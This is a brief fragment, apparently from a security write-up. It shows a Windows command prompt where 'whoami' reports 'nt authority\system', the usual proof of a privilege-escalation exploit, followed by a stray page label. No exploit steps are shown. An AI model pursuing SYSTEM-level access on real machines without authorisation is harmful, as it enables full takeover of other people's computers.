(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Last updated